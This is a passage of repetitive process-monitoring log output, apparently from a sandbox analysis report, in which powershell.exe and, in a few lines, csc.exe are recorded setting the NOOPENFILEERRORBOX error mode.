              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
